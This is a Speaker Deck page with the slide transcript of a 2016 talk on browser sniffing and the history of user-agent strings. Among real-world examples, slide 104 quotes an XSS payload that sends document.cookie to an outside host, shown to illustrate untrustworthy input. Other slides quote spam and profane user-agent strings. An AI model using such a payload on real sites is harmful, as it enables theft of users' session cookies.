Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Everybody Lies @ code.talks 2016

Niels Leenheer
September 30, 2016
Technology
3
910

Everybody Lies @ code.talks 2016

This is a talk about browser sniffing. And yes, I do realise it is 2016. I know browser sniffing is ugly and we should all be using feature detection. But a quick search on Github still shows millions of lines of code referring to user agents strings. So this message clearly hasn’t landed yet. But why is browser sniffing a bad choice? This talk will dive into history and show the origin of the user agent string and the hidden battle between browser makers and web developers. It will show its simple beginnings and the horrible monstrosity it has become.

Niels Leenheer

September 30, 2016
Tweet

More Decks by Niels Leenheer

See All by Niels Leenheer
Fun with Bluetooth @ Frontend United
nielsleenheer
1
140
Fun with Bluetooth @ Amsterdam JSNation
nielsleenheer
1
190
Fun with Bluetooth @ JSConf Belgium
nielsleenheer
0
120
Fun with Bluetooth @ DevDays Vilnius
nielsleenheer
0
200
Fun with Bluetooth @ Universal JS Day
nielsleenheer
0
490
Fun with Bluetooth @ Amsterdam University of Applied Sciences
nielsleenheer
0
120
Fun with Bluetooth @ FrontendNE 2018
nielsleenheer
0
220
Fun with Bluetooth @ DevFestNL
nielsleenheer
0
190
Fun with Bluetooth @ Halfstack
nielsleenheer
0
150

Other Decks in Technology

See All in Technology
OSSコントリビュートをphp-srcメンテナの立場から語る / OSS Contribute
sakitakamachi
0
1.4k
Porting PicoRuby to Another Microcontroller: ESP32
yuuu
4
410
Amazon CloudWatch を使って NW 監視を行うには
o11yfes2023
0
160
3月のAWSアップデートを5分間でざっくりと!
kubomasataka
0
120
ブラウザのレガシー・独自機能を愛でる-Firefoxの脆弱性4選- / Browser Crash Club #1
masatokinugawa
1
460
大AI時代で輝くために今こそドメインにディープダイブしよう / Deep Dive into Domain in AI-Agent-Era
yuitosato
1
360
SREからゼロイチプロダクト開発へ ー越境する打席の立ち方と期待への応え方ー / Product Engineering Night #8
itkq
2
690
MCPを活用した検索システムの作り方/How to implement search systems with MCP #catalks
quiver
12
6.5k
YOLOv10~v12
tenten0727
4
940
Стильный код: натуральный поиск редких атрибутов по картинке. Юлия Антохина, Data Scientist, Lamoda Tech
lamodatech
0
710
低レイヤを知りたいPHPerのためのCコンパイラ作成入門 / Building a C Compiler for PHPers Who Want to Dive into Low-Level Programming
tomzoh
1
230
はてなの開発20年史と DevOpsの歩み / DevOpsDays Tokyo 2025 Keynote
daiksy
6
1.5k

Featured

See All Featured
Making the Leap to Tech Lead
cromwellryan
133
9.2k
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
331
21k
The Illustrated Children's Guide to Kubernetes
chrisshort
48
49k
The Invisible Side of Design
smashingmag
299
50k
Fontdeck: Realign not Redesign
paulrobertlloyd
83
5.5k
Designing Dashboards & Data Visualisations in Web Apps
destraynor
231
53k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
129
19k
Stop Working from a Prison Cell
hatefulcrawdad
268
20k
No one is an island. Learnings from fostering a developers community.
thoeni
21
3.2k
Done Done
chrislema
183
16k
Designing Experiences People Love
moore
141
24k
RailsConf & Balkan Ruby 2019: The Past, Present, and Future of Rails at GitHub
eileencodes
135
33k

Transcript

  1. everybody lies Niels Leenheer 30/09/2016 Niels Leenheer

  2. None
  3. None

  4. this talk is full of 
 lies and deception warning:

  5. None

  6. this talk is about browser sniffing yes…

  7. why?

  8. browser sniffing is 
 dirty

  9. you should use 
 feature detection

  10. None

  11. Dear Web Developers: 
 Browser Sniffing is Stupid http:/ /www.webstandards.org/2002/12/20/dear-web-developers-browser-sniffing-is-stupid/

  12. 5 Reasons Why 
 Browser Sniffing Stinks https:/ /www.sitepoint.com/why-browser-sniffing-stinks/

  13. Browser Detection is Bad https:/ /css-tricks.com/browser-detection-is-bad/

  14. None

  15. feature
 detection responsive
 design progressive
 enhancement best-practices

  16. anti-pattern browser sniffing

  17. browser sniffing is just a tool

  18. everybody uses 
 browser sniffing

  19. None
  20. None

  21. is browser sniffing 
 actually? what…

  22. the http specification defines the user-agent header 
 
 it

    contains a string with information about the browser

  23. every request the browser makes to the server includes the

    user-agent header

  24. GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-us User-Agent:

    Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net 


  25. GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-us User-Agent:

    Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net 
 HTTP/1.1 200 OK Date: Mon, 08 Feb 2016 10:40:28 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT ETag: "984-50cae11796432" Accept-Ranges: bytes Content-Length: 2436 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 
 <!doctype html> <html>

  26. you can access 
 the exact same string 
 using

    javascript

  27. <script type=“text/javascript">
 <!--
 
 alert(navigator.userAgent);
 
 //-->
 </script>


  28. you can use the user-agent string to identify:
 
 the

    browser
 the rendering engine
 the operating system
 the device model
 and more
  29. None

  30. is browser sniffing 
 good for? what…

  31. knowledge

  32. if you know the platform or browser, 
 you can

    streamline the user experience
  33. None

  34. if you know your users, 
 you can build a

    better site for them

  35. if you know which browser is being 
 used, you

    can work around bugs

  36. if you know which browser is causing errors, you can

    fix them

  37. privacy implications

  38. None
  39. None

  40. changing your user agent 
 string actually makes it 


    easier to track you

  41. anonymity by looking 
 like everybody else

  42. brave does not have a useragent string of its own

  43. None
  44. None
  45. None

  46. is browser sniffing 
 so difficult? why…

  47. things started out simple

  48. Mosaic/0.9 The name of 
 the browser The version of


    the browser Mosaic

  49. Mozilla/1.0 (Win3.1) Netscape Navigator The code name of 
 the

    browser The version of
 the browser Operating 
 system

  50. but it quickly started 
 to get complicated

  51. Mozilla/1.0 (compatible; MSIE 1.0; Windows 95) Internet Explorer The name

    of 
 the browser The version of
 the browser Operating 
 system Compatible with 
 Netscape Navigator 1.0

  52. Opera/8.54 (Windows 95; U; en) Opera The name of 


    the browser The version of
 the browser Operating 
 system United States 
 level encryption English 
 language

  53. Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0 Opera Rendering 


    engine

  54. Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.0 Version/10.00 Opera The

    name of 
 the browser Fake version of
 the browser Real version of
 the browser

  55. Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1) 
 Gecko/20090624

    Firefox/3.5 Firefox The name of 
 the browser Version of
 the browser The name of 
 the rendering engine Version of
 the rendering
 engine Build date of
 the rendering engine

  56. Mozilla/5.0 (Windows NT 6.0; rv:2.0) 
 Gecko/20100101 Firefox/4.0 Firefox Build

    date is no longer
 updated

  57. Mozilla/5.0 (Windows NT 6.0; rv:16.0) 
 Gecko/16.0 Firefox/16.0 Firefox

  58. and it gets worse…

  59. Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en)
 AppleWebKit/525.27.1

    (KHTML, like Gecko)
 Version/3.2.3 Safari/525.28.3 Safari The name of 
 the browser Version of
 the browser

  60. Mozilla/5.0 (Windows; U; Windows NT 6.0; en)
 AppleWebKit/525.27.1 (KHTML, like

    Gecko)
 Chrome/15.0.874.120 Safari/525.28.3 Chrome The name of 
 the browser Version of
 the browser

  61. Mozilla/5.0 (Windows NT 10.0; WOW64) 
 AppleWebKit/537.36 (KHTML, like Gecko)

    
 Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180 Opera The name of 
 the browser Version of
 the browser

  62. Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Version of


    the browser Internet Explorer

  63. Mozilla/5.0 (Windows NT 10.0)
 AppleWebKit/537.36 (KHTML, like Gecko)
 Chrome/42.0.2311.135 Safari/525.28.3

    Edge/12.10162 Edge The name of 
 the browser Version of
 the browser

  64. and those were all relatively normal user-agent strings

  65. “User-Agent strings only get larger over time, never smaller” Niels’s

    law of User-Agent strings

  66. sometimes browsers simply do not make sense at all

  67. Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML,

    like Gecko) Version/1.5 Chrome/ 28.0.1500.94 Mobile Safari/537.36 Samsung Internet Version of the browser Samsung device

  68. Mozilla/5.0 (Series40; NOKIALumia800; 
 Profile/MIDP-2.1 Configuration/CLDC-1.1) 
 Gecko/20100401 S40OviBrowser/1.8.0.50.5 Nokia

    Xpress for Windows Phone

  69. Mozilla/5.0 (X11; Linux; ko-KR) 
 AppleWebKit/534.26+ (KHTML, like Gecko) 


    Version/5.0 Safari/534.26+ LG Netcast

  70. sometimes browsers lie to 
 hide their true identity

  71. Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 Opera The

    name of 
 the browser Version of
 the browser The name of the
 operating system

  72. Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 Opera Mobile

    (desktop mode) The name of 
 the browser Version of
 the browser ROT 13 encrypted
 “mobi“

  73. Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Internet Explorer

    Browser version

  74. Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Internet Explorer

    (compatibility view) Trident 5 means it’s 
 Internet Explorer 9

  75. browsers can change the 
 user-agent strings for 
 individual

    websites
  76. None
  77. None

  78. Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; 
 Trident/6.0; ARM;

    Touch; WPDesktop; Lumia 535)
 Mobile Internet Explorer 11 on Windows Phone 8.1 on html5test.com

  79. Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; 
 ARM; Trident/7.0;

    Touch; rv:11.0; IEMobile/11.0; 
 Microsoft; Lumia 535) like iPhone OS 7_0_3 Mac OS X 
 AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537
 Mobile Internet Explorer 11 on Windows Phone 8.1
  80. None
  81. None
  82. None

  83. sometimes browsers 
 are just weird

  84. None

  85. Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0;

    MSIE 5.5; Windows NT 5.0) 
 Opera 7.02 Bork-edition [en]

  86. Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0;

    MSIE 5.5; Windows NT 5.0) 
 Opera 7.02 Bork-edition [en] Vehicle Center Console

  87. Mozilla/4.0 (MobilePhone PLS6600KJ/US/1.0) 
 NetFront/3.1 MMP/2.0

  88. Mozilla/4.08 (PDA; SL-C3000/1.0,Qtopia/1.5.2) NetFront/3.1


  89. Mozilla/5.0 (DTV; TVwithVideoPlayer) NetFront/4.1 
 AQUOSBrowser/1.0 InettvBrowser/2.2 (08001F;DTV06VSFC;0009;0001)


  90. Mozilla/5.0 (Standard; NF41SW/1.1; like Gecko; TASKalfa 406ci) NetFront/4.1


  91. Mozilla/4.0 (PSP (PlayStation Portable); 2.60)

  92. Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2

  93. Mozilla/5.0 (DAG; 1.4; like Gecko) NetFront/4.2
 ?

  94. Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0;

    MSIE 5.5; Windows NT 5.0) 
 Opera 7.02 Bork-edition [en] Opera Bork-edition?
  95. None
  96. None
  97. None

  98. BORK BORK BORK

  99. None
  100. None
  101. None

  102. and it is possible to change the user-agent string yourself

  103. 
 http://www.sexxlife.it/sexyshop (sexy shop - sexy toys, BDSM, vibratori, falli,

    vagine, lubrificanti, dvd porno, film hard, lingerie - Migliaia di articoli nel nostro sexy shop online.; http://www.sexxlife.it; [email protected]) spam

  104. <script>alert("My Little Pony”);</script> <script language="JavaScript">document.location= 
 "http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;</script> <img

    src="http://bravo.trollab.org/mylittlepony.png" 
 alt="My Little Pony”> XSS attacks

  105. XSS attacks

  106. 
 (╯°□°)╯︵ ┻━┻
 
 Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit)


    
 Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; 
 Microsoft; Surface Zune Phone XL) 
 AppleWebKit/537.36 (KHTML, like Gecko)
 funny people

  107. funny people

  108. angry people

  109. FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) 
 FuckYou/123.0 FuckingFox/321.0
 
 Opera/9.80 (Windows

    NT 6.1; U; FuckYou; xx) 
 Presto/2.10.229 Version/11.62
 
 Seriously, Go fuck yourself
 
 W3C standards are important. 
 Stop fucking obsessing over user-agent already. angry people

  110. 1.000.000
 unique
 useragent strings 82 x fuck 10 x shit

    6 x ass 9 x dick 3 x vagina 108 x sex 4 x balls

  111. user-agent strings 
 cannot be trusted!

  112. everybody lies

  113. use browser sniffing for controlling access to 
 your website

    you should never

  114. you should never use browser sniffing for determining browser capabilities

  115. you should never build your own 
 browser sniffing library


  116. None

  117. use a browser sniffing library that 
 is regularly updated

    #1

  118. check if it is possible to automatically schedule updates #2

  119. try libraries like
 UAParser, 
 PiwikDeviceDetector 
 or WhichBrowser https:/

    /github.com/ua-parser
 https:/ /github.com/piwik/device-detector
 https:/ /github.com/whichbrowser

  120. https://github.com/ThaDafinser/UserAgentParserComparison http://useragent.mkf.solutions

  121. None

  122. “If you tell a big enough lie 
 and tell

    it frequently enough, 
 it will be believed” — Ghandi

  123. “If you tell a big enough lie 
 and tell

    it frequently enough, 
 it will be believed” — Ghandi

  124. — Adolf Hitler “If you tell a big enough lie

    
 and tell it frequently enough, 
 it will be believed”

  125. thank you!

  126. thank you!